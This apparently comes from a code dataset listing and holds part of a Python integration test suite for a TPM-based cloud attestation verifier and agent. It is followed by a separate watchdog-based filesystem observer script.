"http_request_ip": cloudverifier_ip,
"http_request_port": cloudverifier_port,
"http_request_path": "/v1/instances",
"http_result_status_expected": 200,
"check_function": {"name": "check_test_persistance_file_load", "argument": "06480EC4-6BF3-4F00-8323-FE6AE5868297"},
},
],
"postrun_function": {"name": "kill_cloudverifier", "argument": None},
},
"test_persistance_file_write": {
"prerun_function": {"name": "launch_cloudverifier", "args": '{}'},
"state_change_functions": [
{
"function_name": "test_persistance_file_write",
"http_request_verb": "POST",
"http_request_ip": cloudverifier_ip,
"http_request_port": cloudverifier_port,
"http_request_path": "/v1/instances",
"http_request_body": '{"v": "nsRIy93UeeAi3GhAxpEcMH6R7OmaB7ArBdn2bEgyEwU=","agent_id":"06480EC4-6BF3-4F00-8323-FE6AE5868297","cloudagent_ip":"127.0.0.1","cloudagent_port":"8882","tpm_policy": {"00": "0000000000000000000000000000000000000000", "mask": "0x400801", "22": "ffffffffffffffffffffffffffffffffffffffff"}}',
"http_result_status_expected": 200,
"check_function": {"name": "check_test_persistance_file_write", "argument": "06480EC4-6BF3-4F00-8323-FE6AE5868297"},
},
],
"postrun_function": {"name": "kill_cloudverifier", "argument": None},
},
"test_persistance_file_bad": {
"prerun_function": {"name": "launch_cloudverifier", "args": '{'},
},
"test_persistance_file_empty": {
"prerun_function": {"name": "launch_cloudverifier", "args": ''},
"state_change_functions": [
{
"function_name": "test_persistance_file_empty",
"http_request_verb": "GET",
"http_request_ip": cloudverifier_ip,
"http_request_port": cloudverifier_port,
"http_request_path": "/v1/instances",
"http_result_status_expected": 200,
"check_function": {"name": "test_check_persistance_file_empty", "argument": None},
},
],
"postrun_function": {"name": "kill_cloudverifier", "argument": None},
},
"test_persistance_file_nonexistent": {
"prerun_function": {"name": "launch_cloudverifier", "args": None},
"state_change_functions": [
{
"function_name": "test_persistance_file_nonexistent",
"http_request_verb": "GET",
"http_request_ip": cloudverifier_ip,
"http_request_port": cloudverifier_port,
"http_request_path": "/v1/instances",
"http_result_status_expected": 200,
"check_function": {"name": "test_check_persistance_file_empty", "argument": None},
},
],
"postrun_function": {"name": "kill_cloudverifier", "argument": None},
},
}
def test_concurrent_cloudnodiness(self):
self.execute_test_definition()
def test_cloudagent_tenant_get_nonce(self):
self.execute_test_definition()
def test_cloudagent_tenant_get_quote(self):
self.execute_test_definition()
def test_cloudverifier_tenant_provide_v(self):
self.execute_test_definition()
def test_concurrent_access(self):
self.execute_test_definition()
def test_full_integration_happy_path(self):
self.execute_test_definition()
def test_persistance_file_load(self):
self.execute_test_definition()
def test_persistance_file_write(self):
self.execute_test_definition()
def test_persistance_file_bad(self):
self.execute_test_definition()
def test_persistance_file_empty(self):
self.execute_test_definition()
def test_persistance_file_nonexistent(self):
self.execute_test_definition()
def test_cloudagent_cloud_verifier_get_quote(self):
pass
def check_test_sleep(self, test_method_name, test_function_name, state_change_or_validation, test_iteration, argument):
time.sleep(argument)
# '{"v": "nsRIy93UeeAi3GhAxpEcMH6R7OmaB7ArBdn2bEgyEwU=","agent_id":"06480EC4-6BF3-4F00-8323-FE6AE5868297","cloudagent_ip":"127.0.0.1","cloudagent_port":"8882","tpm_policy": {"00": "0000000000000000000000000000000000000000", "mask": "0x400801", "22": "ffffffffffffffffffffffffffffffffffffffff"}}',
def read_line_in_file(self, infile, line_number):
with open(infile) as fp:
for i, line in enumerate(fp):
if i == line_number:
return line
return ''
def sleep_for_a_while(self, argument):
time.sleep(float(argument))
def test_concurrent_cloudnodiness_modify_request(self, test_method_name, test_function_name, state_change_or_validation, test_iteration, argument):
test_record = self.test_table.get(test_method_name)
# perform each of the test functions and store the results
for test_functions in test_record[state_change_or_validation]:
if test_functions.get("function_name") == test_function_name:
request_body = test_functions.get("http_request_body")
try:
json_request_body = json.loads(request_body)
tmpp_policy = json_request_body['tpm_policy']
mask = 0
for key in list(tmpp_policy.keys()):
if key.isdigit():
mask = mask + (1 << int(key))
mask_str = "0x%X" % (mask)
tmpp_policy['mask'] = mask_str
json_request_body['tpm_policy'] = tmpp_policy
cloudagent_ip = json_request_body['cloudagent_ip']
if cloudagent_ip.endswith('.txt'):
cloudagent_ip_file = cloudagent_ip
cloudagent_ip_read_from_file = self.read_line_in_file(
cloudagent_ip_file, test_iteration)
json_request_body['cloudagent_ip'] = cloudagent_ip_read_from_file.strip(
)
cloudagent_port = json_request_body['cloudagent_port']
if cloudagent_port.endswith('.txt'):
cloudagent_port_file = cloudagent_port
cloudagent_port_read_from_file = self.read_line_in_file(
cloudagent_port_file, test_iteration)
json_request_body['cloudagent_port'] = cloudagent_port_read_from_file.strip(
)
# parser = ConfigParser.RawConfigParser()
# parser.read(common.CONFIG_FILE)
# test_agent_uuid = parser.get('general', 'agent_uuid')
test_agent_uuid = json_request_body['agent_id']
port_string_length = len(
str(json_request_body['cloudagent_port']))
contrived_uuid = test_agent_uuid[:-port_string_length]
contrived_uuid = contrived_uuid + \
str(json_request_body['cloudagent_port'])
json_request_body['agent_id'] = contrived_uuid
test_functions['http_request_body'] = json.dumps(
json_request_body)
except Exception as e:
self.fail(
"Problem in test_concurrent_cloudnodiness_modify_request() replacing cloudagent_ip or cloudagent_port. Error: %s" % e)
def test_concurrent_cloudnodiness_reset_request(self, test_method_name, test_function_name, state_change_or_validation, test_iteration, argument):
# time.sleep(2)
test_record = self.test_table.get(test_method_name)
# perform each of the test functions and store the results
for test_functions in test_record[state_change_or_validation]:
if test_functions.get("function_name") == test_function_name:
request_body = test_functions.get("http_request_body")
try:
json_request_body = json.loads(request_body)
# reset the request body to file arguments for next iteration
json_request_body['cloudagent_ip'] = argument["ip_file"]
json_request_body['cloudagent_port'] = argument["port_file"]
test_functions['http_request_body'] = json.dumps(
json_request_body)
except Exception as e:
self.fail(
"Problem in test_concurrent_cloudnodiness_modify_request() replacing cloudagent_ip or cloudagent_port. Error: %s" % e)
def test_check_persistance_file_empty(self, test_method_name, test_function_name, state_change_or_validation, test_iteration, argument):
test_record = self.test_table.get(test_method_name)
# perform each of the test functions and store the results
for test_functions in test_record[state_change_or_validation]:
if test_functions.get("function_name") == test_function_name:
target_body = test_functions.get("http_result_body_actual")
try:
jsondecoded = json.loads(target_body)
# test to make sure these two keys (and values) are in the return
if len(jsondecoded) != 0:
self.fail(
"Expected empty persistence file to replace non existent persistence file on startup.")
except Exception as e:
self.fail(
"Problem reading persistence file after replacement of empty persistence file. Error: %s" % e)
def check_test_persistance_file_write(self, test_method_name, test_function_name, state_change_or_validation, test_iteration, argument):
test_record = self.test_table.get(test_method_name)
uuid_str = argument
# perform each of the test functions and store the results
for test_functions in test_record[state_change_or_validation]:
if test_functions.get("function_name") == test_function_name:
try:
with open(cv_persistence_filename, "r") as persistance_file:
file_contents = persistance_file.read()
json_content = json.loads(file_contents)
if len(json_content) != 1 or json_content.get(uuid_str) is None:
self.fail("Unexpected persistence file contents.")
except Exception as e:
self.fail(
"Problem reading persistence file after POST. Error: %s" % e)
try:
with open(cv_persistence_filename + ".bak", "r") as backup_persistance_file:
backup_file_contents = backup_persistance_file.read()
json_backup_content = json.loads(backup_file_contents)
if len(json_backup_content) != 0:
self.fail(
"Unexpected backup persistence file contents.")
except Exception as e:
self.fail(
"Problem reading backup persistence file after POST. Error: %s" % e)
def check_test_persistance_file_load(self, test_method_name, test_function_name, state_change_or_validation, test_iteration, argument):
test_record = self.test_table.get(test_method_name)
uuid_str = argument
# perform each of the test functions and store the results
for test_functions in test_record[state_change_or_validation]:
if test_functions.get("function_name") == test_function_name:
target_body = test_functions.get("http_result_body_actual")
jsondecoded = json.loads(target_body)
# test to make sure these two keys (and values) are in the return
if len(jsondecoded) != 1 or jsondecoded.get(uuid_str) is None:
self.fail("Expected " + uuid_str +
" to be in the list of active agent_ids")
# def do_mock_for_test_cloudverifier_tenant_provide_v(self, argument):
# global text_callback
# nonce = tpm_initialize.random_password(20)
# tpm_policy = {"00": "0000000000000000000000000000000000000000", "mask": "0x400801", "22": "ffffffffffffffffffffffffffffffffffffffff" }
# #theurl = 'http://' + cloudagent_ip + ':' + cloudagent_port + "/v1/quotes/cloudverifier" + "?nonce=" + nonce + "&mask=" + tpm_policy['mask']
# theurl = 'http://' + cloudagent_ip + ':' + cloudagent_port + "/v1/quotes/cloudverifier"
# with requests_mock.Mocker(real_http=True) as m:
# m.get(requests_mock.ANY, text=text_callback)
def provide_e(self, test_method_name, test_function_name, state_change_or_validation, test_iteration, argument):
test_record = self.test_table.get(test_method_name)
# perform each of the test functions and store the results
for test_functions in test_record[state_change_or_validation]:
if test_functions.get("function_name") == test_function_name:
response_body = test_functions.get("http_result_body_actual")
jsondecoded = json.loads(response_body)
public_key = jsondecoded.get("pubkey")
quote = jsondecoded.get("quote")
# test to make sure these two keys (and values) are in the return
if public_key is None or quote is None:
self.fail("Expected both pubkey and quote arguments.")
else:
mytenant = tenant.Tenant()
# command line options can overwrite config values
mytenant.cloudagent_ip = cloudagent_ip
mytenant.cloudverifier_ip = cloudverifier_ip
mytenant.agent_uuid = "C432FBB3-D2F1-4A97-9EF7-75BD81C866E9"
if mytenant.validate_tpm_quote(public_key, quote):
# encrypt U with the public key
global U, K
encrypted_U = crypto.rsa_encrypt(
crypto.rsa_import_pubkey(public_key), str(U))
encrypt_check = crypto.do_hmac(K, mytenant.agent_uuid)
b64_encrypted_u = base64.b64encode(encrypted_U)
data = {
'encrypted_key': b64_encrypted_u,
'encrypt_check': encrypt_check
}
u_json_message = json.dumps(data)
# post encrypted U back to Cloud Agent
response = tornado_requests.request(
"POST", "http://%s:%s/v1/quotes/tenant" % (cloudagent_ip, cloudagent_port), data=u_json_message)
if response.status_code != 200:
self.fail(
"Posting of Encrypted U to the Cloud Agent failed with response code %d" % response.status_code)
else:
self.fail(
"TPM Quote from cloud agent is invalid for nonce: %s" % self.nonce)
def check_test_cloudagent_tenant_get_nonce(self, test_method_name, test_function_name, state_change_or_validation, test_iteration, argument):
test_record = self.test_table.get(test_method_name)
# perform each of the test functions and store the results
for test_functions in test_record[state_change_or_validation]:
if test_functions.get("function_name") == test_function_name:
target_body = test_functions.get("http_result_body_actual")
jsondecoded = json.loads(target_body)
# test to make sure these two keys (and values) are in the return
if jsondecoded.get("pubkey") is None or jsondecoded.get("quote") is None:
self.fail("Expected both pubkey and quote arguments.")
def check_validate_test_cloudverifier_tenant_provide_v(self, test_method_name, test_function_name, state_change_or_validation, test_iteration, argument):
test_record = self.test_table.get(test_method_name)
# lookup test data and compare the results to canned values
for test_functions in test_record[state_change_or_validation]:
if test_functions.get("function_name") == test_function_name:
target_body = test_functions.get("http_result_body_actual")
jsondecoded = json.loads(target_body)
v = jsondecoded.get("v")
ip = jsondecoded.get("ip")
port = jsondecoded.get("port")
tpm_policy = jsondecoded.get("tpm_policy")
if v is None or v != "nsRIy93UeeAi3GhAxpEcMH6R7OmaB7ArBdn2bEgyEwU=":
self.fail(
"Returned v from instance 06480EC4-6BF3-4F00-8323-FE6AE5868297 was not correct.")
if ip is None or ip != "127.0.0.1":
self.fail(
"Returned ip from instance 06480EC4-6BF3-4F00-8323-FE6AE5868297 was not correct.")
if port is None or port != "8882":
self.fail(
"Returned port from instance 06480EC4-6BF3-4F00-8323-FE6AE5868297 was not correct.")
if tpm_policy is None or tpm_policy != {"00": "0000000000000000000000000000000000000000", "mask": "0x400801", "22": "ffffffffffffffffffffffffffffffffffffffff"}:
self.fail(
"Returned tpm_policy from instance 06480EC4-6BF3-4F00-8323-FE6AE5868297 was not correct.")
def check_and_delete_all_entries(self, test_method_name, test_function_name, state_change_or_validation, test_iteration, argument):
test_record = self.test_table.get(test_method_name)
# lookup test data and compare the results to canned values
for test_functions in test_record[state_change_or_validation]:
if test_functions.get("function_name") == test_function_name:
target_body = test_functions.get("http_result_body_actual")
agent_id_list = json.loads(target_body)
expected_len = argument
actual_len = len(agent_id_list)
if actual_len != expected_len:
self.fail("Expected " + str(expected_len) +
" instance id's but received " + str(actual_len))
for agent_id in agent_id_list:
params = {
'agent_id': agent_id,
}
try:
response = tornado_requests.request("DELETE",
"http://" + cloudverifier_ip + ":" + cloudverifier_port + "/v1/instances",
params=params)
if response.status_code != 200:
self.fail("Delete of agent_id " +
agent_id + " failed.")
except Exception as e:
self.fail("Delete of agent_id " + agent_id +
" failed with exception: %s" % e)
def execute_the_test(self, setup_or_state_change_or_validation, test_functions, test_iteration):
# call the pre_function
pre_function = test_functions.get("pre_function")
if pre_function is not None:
pre_function_name = pre_function.get('name')
pre_function_args = pre_function.get('args')
# self._testMethodName, test_functions["function_name"], setup_or_state_change_or_validation, check_argument
function_return = getattr(self, pre_function_name)(
self._testMethodName, test_functions["function_name"], setup_or_state_change_or_validation, test_iteration, pre_function_args)
if not function_return:
self.fail("Test " + self._testMethodName + ":" +
test_functions["function_name"] + ":" + pre_function_name + " pre_function failure, test aborted.")
full_url = "http://" + test_functions.get("http_request_ip") + ":" + test_functions.get(
"http_request_port") + test_functions.get("http_request_path")
http_request_body_tag = test_functions.get("http_request_body")
http_request_body_file_tag = test_functions.get(
"http_request_body_file")
if http_request_body_tag is not None and http_request_body_file_tag is not None:
self.fail("Test " + self._testMethodName + ":" +
test_functions["function_name"] + " contains both http_request_body and http_request_body_file tags.")
thedata = ''
if http_request_body_tag is None and http_request_body_file_tag is not None:
thedata = open(http_request_body_file_tag).read()
else:
thedata = http_request_body_tag
verb = test_functions.get("http_request_verb")
query = test_functions.get("http_request_query", "")
test_functions.get("http_request_header")
req_header = test_functions.get("http_request_header")
response = tornado_requests.request(verb, full_url,
params=query,
data=thedata,
headers=req_header)
temp = tempfile.TemporaryFile()
for chunk in response.iter_content(1024):
temp.write(chunk)
temp.seek(0)
# copy the results for future checking
test_functions["http_result_status_actual"] = response.status_code
test_functions["http_result_header_actual"] = response.headers
test_functions["http_result_body_actual"] = temp.read()
# validate response status
if test_functions["http_result_status_actual"] != test_functions["http_result_status_expected"]:
self.fail("Test " + self._testMethodName + ":" + test_functions["function_name"] + " expected " + str(
test_functions["http_result_status_expected"]) + " but received " + str(test_functions["http_result_status_actual"])) # reset the file marker for reading
# validate response headers
if test_functions.get("http_result_header_expected") is not None and not all(item in list(response.headers.items()) for item in list(test_functions["http_result_header_expected"].items())):
self.fail("Test " + self._testMethodName + ":" +
test_functions["function_name"] + ", didn't receive expected headers.")
# validate (shallow) response body
if test_functions.get("http_result_body_expected") is not None and json.loads(test_functions.get("http_result_body_expected")) != json.loads(test_functions.get("http_result_body_actual")):
self.fail("Test " + self._testMethodName + ":" +
test_functions["function_name"] + ", didn't receive exact expected result body.")
# validate (deep) response body
check_function = test_functions.get("check_function")
if check_function is not None:
check_argument = check_function.get("argument")
if getattr(self, check_function["name"])(self._testMethodName, test_functions["function_name"], setup_or_state_change_or_validation, test_iteration, check_argument):
self.fail("Test " + self._testMethodName + ":" +
test_functions["function_name"] + ", didn't receive exact expected result body.")
# call the post_function
post_function = test_functions.get("post_function")
if post_function is not None:
post_function_name = post_function.get('name')
post_function_args = post_function.get('args')
function_return = getattr(self, post_function_name)(
self._testMethodName, test_functions["function_name"], setup_or_state_change_or_validation, test_iteration, post_function_args)
if not function_return:
self.fail("Test " + self._testMethodName + ":" +
test_functions["function_name"] + ":" + post_function_name + " post_function failure, test aborted.")
temp.close()
def request_task(self, queue, setup_or_state_change_or_validation, test_functions, test_iteration):
try:
# Table data does not provide ability to inject unique agent_id's for each concurrent instance.
# The queue stores unique agent_id objects, injected by the new_thread function.
# Get the agent_id from the Queue and modify the original table data to change the agent_id to something unique.
http_request_body_tag = test_functions.get("http_request_body")
http_request_body_file_tag = test_functions.get(
"http_request_body_file")
if http_request_body_tag is not None and http_request_body_file_tag is not None:
self.fail("Test " + self._testMethodName + ":" +
test_functions["function_name"] + " contains both http_request_body and http_request_body_file tags.")
thedata = ''
if http_request_body_tag is None and http_request_body_file_tag is not None:
thedata = open(http_request_body_file_tag).read()
else:
thedata = http_request_body_tag
the_uid = queue.get()
jsondata = json.loads(thedata)
jsondata['agent_id'] = the_uid
newdata = json.dumps(jsondata)
# call the inline task passing the new data with the unique agent_id
self.execute_the_test(
setup_or_state_change_or_validation, test_functions, test_iteration)
except Exception as e:
self.fail("Test " + self._testMethodName + ":" +
test_functions["function_name"] + ", unexpected exception error: %s" % e)
finally:
queue.task_done()
def modify_persistence_file(self, argument):
string_to_write = None
if isinstance(argument, dict):
string_to_write = json.dumps(argument)
elif isinstance(argument, str):
string_to_write = argument
elif isinstance(argument, _io.TextIOWrapper):
string_to_write = argument.read()
argument.close()
elif argument is None:
if os.path.isfile(cv_persistence_filename):
os.remove(cv_persistence_filename)
if string_to_write is not None:
with open(cv_persistence_filename, "w") as persistance_file:
persistance_file.write(string_to_write)
backup_file_name = cv_persistence_filename + ".bak"
if os.path.isfile(backup_file_name):
os.remove(backup_file_name)
def launch_cloudverifier(self, argument):
readKUV()
# modify the persistence file per the passed argument
if argument is not None:
self.modify_persistence_file(argument)
global cv_process
cv_process = subprocess.Popen("python cloud_verifier.py", shell=True)
time.sleep(1)
return True
def overwrite_config_file(self, path, section, option, value):
parser = configparser.RawConfigParser()
parser.read(path)
parser.set(section, option, value)
# Writing our configuration file to 'example.ini'
with open(path, 'wb') as configfile:
parser.write(configfile)
def launch_cloudagents(self, argument):
# self.launch_cloudverifier(None)
port_file = argument.get('port_file')
cloudagent_start_port = argument.get('starting_port')
num_cloudagent_instances = argument['num_cloudagent_instances']
if cloudagent_start_port is not None:
parser = configparser.RawConfigParser()
parser.read(common.CONFIG_FILE)
original_cloudagent_port = parser.get('general', 'cloudagent_port')
test_agent_uuid = parser.get('general', 'agent_uuid')
for cn in range(num_cloudagent_instances):
new_dir = r'../cloudagent_on_port_' + \
str(cloudagent_start_port)
config_file_path = new_dir + "/keylime.conf"
copy_tree('.', new_dir)
shutil.copyfile(common.CONFIG_FILE, config_file_path)
if not os.path.isdir(new_dir):
os.mkdir(new_dir)
# shutil.copyfile(r'../keylime.conf', new_dir + r'/keylime.conf')
self.overwrite_config_file(config_file_path,
'general',
'cloudagent_port',
str(cloudagent_start_port))
port_string_length = len(str(cloudagent_start_port))
contrived_uuid = test_agent_uuid[:-port_string_length]
contrived_uuid = contrived_uuid + str(cloudagent_start_port)
self.overwrite_config_file(
config_file_path, 'general', 'agent_uuid', contrived_uuid)
cn_process_list.append(subprocess.Popen(
"python cloud_agent.py", shell=True, cwd=new_dir, preexec_fn=os.setsid).pid)
cloudagent_start_port = cloudagent_start_port + 1
# time.sleep(2)
self.overwrite_config_file(
common.CONFIG_FILE, 'general', 'cloudagent_port', str(original_cloudagent_port))
elif port_file is not None:
parser = configparser.RawConfigParser()
parser.read(common.CONFIG_FILE)
original_cloudagent_port = parser.get('general', 'cloudagent_port')
test_agent_uuid = parser.get('general', 'agent_uuid')
for cn in range(num_cloudagent_instances):
cloudagent_port_read_from_file = self.read_line_in_file(
port_file, cn).strip()
new_dir = r'../cloudagent_on_port_' + cloudagent_port_read_from_file
config_file_path = new_dir + "/keylime.conf"
copy_tree('.', new_dir)
shutil.copyfile(common.CONFIG_FILE, config_file_path)
if not os.path.isdir(new_dir):
os.mkdir(new_dir)
# shutil.copyfile(r'../keylime.conf', new_dir + r'/keylime.conf')
self.overwrite_config_file(
config_file_path, 'general', 'cloudagent_port', cloudagent_port_read_from_file)
port_string_length = len(cloudagent_port_read_from_file)
contrived_uuid = test_agent_uuid[:-port_string_length]
contrived_uuid = contrived_uuid + cloudagent_port_read_from_file
self.overwrite_config_file(
config_file_path, 'general', 'agent_uuid', contrived_uuid)
cn_process_list.append(subprocess.Popen(
"python cloud_agent.py", shell=True, cwd=new_dir, preexec_fn=os.setsid).pid)
cloudagent_port = int(cloudagent_port_read_from_file) + 1
# time.sleep(2)
self.overwrite_config_file(
common.CONFIG_FILE, 'general', 'cloudagent_port', str(original_cloudagent_port))
print("done creating cloud agents, waiting for them to start...")
time.sleep(10)
print("starting test...")
def kill_cloudagents_after_delay(self, argument):
sleep_time = argument.get('sleep')
time.sleep(sleep_time)
# self.launch_cloudverifier(None)
port_file = argument.get('port_file')
cloudagent_start_port = argument.get('starting_port')
num_cloudagent_instances = argument['num_cloudagent_instances']
if cloudagent_start_port is not None:
parser = configparser.RawConfigParser()
parser.read(common.CONFIG_FILE)
for cn in range(num_cloudagent_instances):
new_dir = r'../cloudagent_on_port_' + \
str(cloudagent_start_port)
shutil.rmtree(new_dir)
cloudagent_port = cloudagent_start_port + 1
elif port_file is not None:
parser = configparser.RawConfigParser()
parser.read(common.CONFIG_FILE)
test_agent_uuid = parser.get('general', 'agent_uuid')
for cn in range(num_cloudagent_instances):
cloudagent_port_read_from_file = self.read_line_in_file(
port_file, cn).strip()
port_string_length = len(cloudagent_port_read_from_file)
contrived_uuid = test_agent_uuid[:-port_string_length]
contrived_uuid = contrived_uuid + cloudagent_port_read_from_file
params = {
'agent_id': contrived_uuid,
}
try:
print(("Sending #" + str(cn) +
" DELETE request to CV for uuid: " + contrived_uuid))
response = tornado_requests.request("DELETE",
"http://" + cloudverifier_ip + ":" + cloudverifier_port + "/v1/instances",
params=params)
if response.status_code != 200:
self.fail("Delete of agent_id " +
contrived_uuid + " failed.")
except Exception as e:
self.fail("Delete of agent_id " + contrived_uuid +
" failed with exception: %s" % e)
for cn in range(num_cloudagent_instances):
cloudagent_port_read_from_file = self.read_line_in_file(
port_file, cn).strip()
new_dir = r'../cloudagent_on_port_' + cloudagent_port_read_from_file
shutil.rmtree(new_dir)
for the_pid in cn_process_list:
print(("killing pid" + str(the_pid)))
os.killpg(the_pid, signal.SIGTERM)
def kill_cloudverifier(self, argument):
cv_process.kill()
return True
def launch_cloudagent(self, argument):
readKUV()
global cn_process
cn_process = subprocess.Popen("python cloud_agent.py", shell=True)
time.sleep(1)
return True
def kill_cloudagent(self, argument):
cn_process.kill()
return True
def launch_required_servers(self, argument):
self.launch_cloudagent(argument)
self.launch_cloudverifier(argument)
return True
def kill_required_servers(self, argument):
self.kill_cloudagent(argument)
self.kill_cloudverifier(argument)
return True
def new_thread(self, args):
# create a new uuid, and place it in the queue
the_global_queue = args[0]
new_uuid = str(uuid.uuid4())
the_global_queue.put(new_uuid)
return threading.Thread(target=self.request_task, args=args)
def execute_test_function_set(self, setup_or_state_change_or_validation):
# look up the test record
test_record = self.test_table.get(self._testMethodName)
# perform each of the test functions and store the results
change_or_validation = test_record.get(
setup_or_state_change_or_validation)
if change_or_validation is not None:
for test_functions in test_record[setup_or_state_change_or_validation]:
# full_url = "http://" + test_functions.get("http_request_ip") + ":" + test_functions.get("http_request_port") + test_functions.get("http_request_path")
# http_request_body_tag = test_functions.get("http_request_body")
# http_request_body_file_tag = test_functions.get("http_request_body_file")
# if http_request_body_tag != None and http_request_body_file_tag != None :
# self.fail("Test " + self._testMethodName + ":" + test_functions["function_name"] + " contains both http_request_body and http_request_body_file tags." )
#
# thedata = ''
# if http_request_body_tag == None and http_request_body_file_tag != None:
# thedata = open(http_request_body_file_tag).read()
# else:
# thedata=http_request_body_tag
# verb = test_functions.get("http_request_verb")
# query = test_functions.get("http_request_query","")
# test_functions.get("http_request_header")
# req_header = test_functions.get("http_request_header")
concurrent_instances = None
concurrent_new_thread_function = None
concurrency_dict = test_functions.get("concurrency")
if concurrency_dict is not None:
concurrent_instances = concurrency_dict.get("instances")
concurrent_new_thread_function = concurrency_dict.get(
"new_thread_function")
if concurrent_instances is None or concurrent_new_thread_function is None:
self.fail("Test " + self._testMethodName + ":" +
test_functions["function_name"] + ' contains concurrency agent without mandatory \\"instances\\" or and \\"new_thread_function\\" specifiers')
for test_iteration in range(int(test_functions.get("test_iterations", "1"))):
if concurrent_instances is None:
# do it inline on this thread
self.execute_the_test(
setup_or_state_change_or_validation, test_functions, test_iteration)
else:
threads = []
for count in range(concurrent_instances):
args = (queue, setup_or_state_change_or_validation,
test_functions, test_iteration)
# call the new_thread_function specified in the test table under concurrency tag.
# the new_thread_function is responsible for setting up the task, and creating the new thread.
# the task given to the thread must not block and call task_done() on completion regardless of success or failure
new_thread = getattr(
self, concurrent_new_thread_function)(args)
threads.append(new_thread)
# start the threads
for t in threads:
t.start()
# blocks until all tasks have called task_done()
queue.join()
# blocks until all threads are complete
for t in threads:
t.join()
def execute_test_definition(self):
test_record = self.test_table.get(self._testMethodName)
prerun_function_dict = test_record.get("prerun_function")
if prerun_function_dict is not None:
prerun_function_name = prerun_function_dict.get("name")
prerun_function_args = prerun_function_dict.get("args")
function_return = getattr(
self, prerun_function_name)(prerun_function_args)
self.execute_test_function_set("setup_functions")
self.execute_test_function_set("state_change_functions")
self.execute_test_function_set("state_validation_functions")
postrun_function_dict = test_record.get("postrun_function")
if postrun_function_dict is not None:
postrun_function_name = postrun_function_dict.get("name")
postrun_function_args = postrun_function_dict.get("args")
function_return = getattr(
self, postrun_function_name)(postrun_function_args)
def setUp(self):
pass
def tearDown(self):
# os.killpg(self.cloudverifier_process.pid, signal.SIGKILL)
pass
if __name__ == "__main__":
# import sys;sys.argv = ['', 'Test.testName']
unittest.main()
|
script.py | from __future__ import absolute_import
from __future__ import division
from __future__ import unicode_literals
try:
import queue
except ImportError:
import Queue as queue
import argparse
import importlib
import os
import sys
import threading
from spreadflow_observer_fs.protocol import MessageFactory
from pathtools.patterns import match_path, filter_paths
from watchdog.events import PatternMatchingEventHandler
class EventHandler(PatternMatchingEventHandler):
def __init__(self, pattern, changes_queue):
super(EventHandler, self).__init__(patterns=[pattern],
ignore_patterns=None, ignore_directories=True,
case_sensitive=False)
self._changes_queue = changes_queue
self._inserts = []
self._deletes = []
def on_moved(self, event):
if event.src_path and match_path(event.src_path,
included_patterns=self.patterns,
excluded_patterns=self.ignore_patterns,
case_sensitive=self.case_sensitive):
self._deletes.append(event.src_path)
if event.dest_path and match_path(event.dest_path,
included_patterns=self.patterns,
excluded_patterns=self.ignore_patterns,
case_sensitive=self.case_sensitive):
self._inserts.append(event.dest_path)
self.flush()
def on_created(self, event):
self._inserts.append(event.src_path)
self.flush()
def on_deleted(self, event):
self._deletes.append(event.src_path)
self.flush()
def on_modified(self, event):
self._deletes.append(event.src_path)
self._inserts.append(event.src_path)
self.flush()
def flush(self):
if len(self._inserts) or len(self._deletes):
self._changes_queue.put((tuple(self._deletes), tuple(self._inserts)))
self._inserts = []
self._deletes = []
class WatchdogObserverCommand(object):
query = None
native_query = None
directory = None
observer_class = 'watchdog.observers.Observer'
def __init__(self, out=None):
if out is None:
try:
# Python 3 does not allow us to write binary data to stdout.
# Except if we use the buffer directly :/
# http://stackoverflow.com/a/908440/2779045
self._out = sys.stdout.buffer #pylint: disable=no-member
except AttributeError:
self._out = sys.stdout
def load_observer(self, fqcn):
module_name, class_name = fqcn.rsplit(".", 1)
observer_module = importlib.import_module(module_name)
return getattr(observer_module, class_name)
def run(self, args):
parser = argparse.ArgumentParser(prog=args[0])
parser.add_argument('directory', metavar='DIR',
help='Base directory')
parser.add_argument('query', metavar='PATTERN',
help='Pattern or query string')
parser.add_argument('-n', '--native-query', action='store_true',
help='PATTERN is a native query for the selected observer')
parser.add_argument('-o', '--observer-class', metavar='CLASS',
help='Specify the watchdog observer implementation (fully qualified class name).')
parser.parse_args(args[1:], namespace=self)
try:
Observer = self.load_observer(self.observer_class)
except:
parser.error("Watchdog observer implementation not found")
changes_queue = queue.Queue()
stop_sentinel = object()
def stdin_watch():
while sys.stdin.read():
pass
changes_queue.put(stop_sentinel)
stdin_watch_thread = threading.Thread(target=stdin_watch)
stdin_watch_thread.start()
pattern = self.query
if not self.native_query:
pattern = '*/' + pattern
event_handler = EventHandler(pattern, changes_queue)
observer = Observer()
observer.schedule(event_handler, self.directory, recursive=True)
observer.start()
factory = MessageFactory()
for root, dirs, files in os.walk(os.path.abspath(self.directory)):
paths = [os.path.join(root, f) for f in files]
inserts = tuple(filter_paths(paths, included_patterns=[pattern], case_sensitive=False))
if len(inserts):
changes_queue.put((tuple(), tuple(inserts)))
while True:
try:
item = changes_queue.get(timeout=1000)
if item == stop_sentinel:
break
(deletable_paths, insertable_paths) = item
insertable_meta = []
insertable_paths_ok = []
for path in insertable_paths[:]:
try:
insertable_meta.append({'stat': tuple(os.stat(path))})
insertable_paths_ok.append(path)
except OSError:
continue
for msg in factory.update(deletable_paths, tuple(insertable_paths_ok), tuple(insertable_meta)):
self._out.write(msg)
self._out.flush()
changes_queue.task_done()
except queue.Empty:
pass
except KeyboardInterrupt:
break
observer.stop()
observer.join()
stdin_watch_thread.join()
def main():
cmd = WatchdogObserverCommand()
sys.exit(cmd.run(sys.argv))
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.